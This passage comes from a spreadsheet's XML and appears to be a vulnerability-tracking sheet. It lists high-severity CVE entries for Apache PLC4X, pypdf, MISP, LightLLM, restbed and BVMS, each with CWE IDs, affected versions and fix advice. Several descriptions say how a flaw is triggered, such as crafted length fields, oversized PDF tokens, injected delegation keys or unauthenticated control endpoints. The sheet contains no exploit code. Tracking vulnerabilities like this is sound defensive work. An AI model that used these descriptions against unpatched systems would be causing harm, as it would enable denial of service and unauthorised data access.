      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102509</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-674, CWE-770, CWE-789</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>Memory Allocation with Excessive Size Value, Allocation of Resources Without Limits, and Uncontrolled Recursion in the Java implementation of Apache PLC4X (PLC4J) allow a malicious or impersonated device to exhaust the memory or stack of the client application, causing a denial of service.
In the OPC UA driver these defects are reachable before authentication: the offending data is parsed while the secure channel and session are being established, before the server's identity has been bound to it. Configuring a trusted server therefore does not prevent exploitation by an attacker who can 
impersonate it.
The individual defects are:
- Length-prefixed byte strings are allocated at the size claimed on the wire before the length is checked against the data actually received (0.10.0 through 0.13.1).
- Array fields in generated protocol parsers pre-allocate a list with the element count claimed on the wire, allowing a single count field to trigger a multi-gigabyte allocation. This parser is shared by all PLC4J drivers; the OPC UA driver is the verified pre-authentication path (0.10.0 through 0.13.1).
- The OPC UA driver accumulates message chunks without enforcing the negotiated maximum chunk count and message size (0.12.0 through 0.13.1).
- The OPC UA driver pre-allocates collections using element counts received from the server (0.10.0 through 0.13.1).
- Recursive protocol types are parsed without a nesting-depth limit. The same defect in the Go implementation is covered by  CVE-2026-102510 https://cveprocess.apache.org/cve5/CVE-2026-102510 .
This issue affects Apache PLC4X: from 0.10.0 before 1.0.0.
Users are recommended to upgrade to version 1.0.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102509</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102510</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-190, CWE-674, CWE-789</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>Integer Overflow, Improper Validation of Array Index, Uncontrolled Recursion and Memory Allocation with Excessive Size Value in the Go implementation of Apache PLC4X (PLC4Go) allow a malicious device, or an attacker able to inject network traffic, to crash or exhaust the memory of the client application,
causing a denial of service.
The individual defects are:
- Generated parsers pre-allocate arrays with the element count claimed on the wire (0.13.0 through 0.13.1).
- Transport read helpers allocate buffers of the size claimed on the wire without an upper bound.
- ADS and KNXnet/IP response handling indexes into received data without checking its length, causing a panic.
- ADS and EIP frame-length handling accepts, or arithmetically wraps to, a length of zero, breaking message framing.
- Recursive protocol types are parsed without a nesting-depth limit. The same defect in the Java implementation is covered by  CVE-2026-102509 https://cveprocess.apache.org/cve5/CVE-2026-102509 .
Additionally, length and position arithmetic in generated serializers was performed in 16-bit integers. If an application forwards attacker-influenced payloads larger than 8 KB, the length field wraps, and the remainder of the payload may be interpreted by the receiving device (for example, an ADS PLC) as 
additional, independent protocol messages.
This issue affects Apache PLC4X: from 0.11.0 before 1.0.0. PLC4Go is consumed as the Go module github.com/apache/plc4x/plc4go; versions refer to the corresponding Apache PLC4X releases.
Users are recommended to upgrade to version 1.0.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102510</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102993</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.17.0, a crafted PDF can provide unusually large Roman page-label values that cause pypdf/_page_labels.py to generate excessively large numeral strings when an application retrieves document page labels, consuming large amounts of memory and potentially making the application unavailable. This issue is fixed in version 6.17.0.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102993</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102994</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.0, a crafted PDF containing indirect-object identifiers or generation-number tokens that continue for a long time without whitespace can cause pypdf/_reader.py and pypdf/generic/_base.py to scan excessive input through read_until_whitespace, resulting in long runtimes and application unavailability. This issue is fixed in version 6.18.0.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102994</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102995</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.1, a crafted PDF can place unusually large source-code or destination-string tokens in a font /ToUnicode mapping, causing pypdf/_cmap.py parse_bfchar to decode and retain oversized values during operations such as text extraction and consume excessive memory. This is a second follow-up to earlier /ToUnicode resource-consumption fixes and is limited to the remaining token-length path. This issue is fixed in version 6.18.1.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102995</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102996</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.1, a crafted PDF can provide a TrueType or Type1 simple font with an unusually large /Widths array, causing pypdf/_font.py Font._collect_tt_t1_character_widths to process entries beyond the 256 character codes meaningful for a simple font and consume excessive memory during operations such as text extraction. This issue is fixed in version 6.18.1.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102996</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102997</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.1, a crafted PDF containing a partially malformed /FlateDecode stream with padded data can force pypdf/filters.py to use inefficient byte-by-byte decompression while the earlier recovery counter fails to advance for bytes that successfully decode, causing long runtimes and application unavailability. This is a residual issue after the malformed FlateDecode recovery fix. This issue is fixed in version 6.18.1.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102997</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102998</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.19.0, a crafted PDF with form field values can cause pypdf/generic/_appearance_stream.py appearance-stream generation to repeat invariant selection-data work inside a loop when an application updates fields with flattening enabled, resulting in excessive runtimes and application unavailability. This issue is fixed in version 6.19.0.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102998</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102999</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.19.0, a crafted PDF containing many embedded files can cause the dictionary-based attachments API in pypdf/_doc_common.py to reparse the full attachment list for each content lookup, producing repeated work and long runtimes when an application accesses the embedded-file mapping. This issue is fixed in version 6.19.0.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102999</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103000</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.19.0, a crafted PDF can provide unusually large alphabetical page-label values that cause pypdf/_page_labels.py to generate strings beyond a reasonable page-label length when an application retrieves document page labels, consuming excessive memory and potentially making the application unavailable. This issue is fixed in version 6.19.0.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103000</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103235</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-915</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>MISP contains a mass assignment vulnerability in the event delegation feature. When a user with delegation permission submits a delegation request, the application authorized the user against the event identified in the URL but then persisted the entire submitted record, including caller-supplied fields such as the primary key and event_id.
An authenticated attacker could inject a primary key or event_id into the delegation payload to retarget an existing delegation record to any event on the instance. Because a delegation row grants the requesting organisation read access to the event it references, this effectively granted read access to arbitrary events belonging to other organisations. If the target organisation subsequently accepted the delegation, ownership of the event was transferred and the original record was deleted.
Preconditions:
- An authenticated user with the delegation permission (perm_delegate)
- The MISP.delegation server setting must be enabled
Impact:
- Confidentiality: read access to any event on the instance
- Integrity: overwriting existing delegation records and transferring event ownership
Affected versions: MISP &lt; 2.5.48</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103235</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103270</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 mounts reinforcement learning control routes on the public HTTP API without authentication checks. Unauthenticated attackers can call endpoints like /pause_generation, /abort_request, /flush_cache, and /init_weights_update_group to disrupt inference operations and wedge workers on deployments started with --enable_rl.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103270</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103471</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>restbed through 5.0.0 buffers HTTP request headers without enforcing a maximum size limit, allowing remote unauthenticated attackers to exhaust server memory. Attackers can open TCP connections and stream bytes indefinitely without sending the header delimiter, forcing the server to allocate unbounded heap memory until the process is killed.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103471</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10764</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>4237bc98-ed97-4aeb-8e67-37a47a9e179d</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>Information disclosure in BVMS 4.5 up to 12.3 including allows man-in-the-middle attackers to gain unauthorized access to sensitive data.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10764</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47097</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
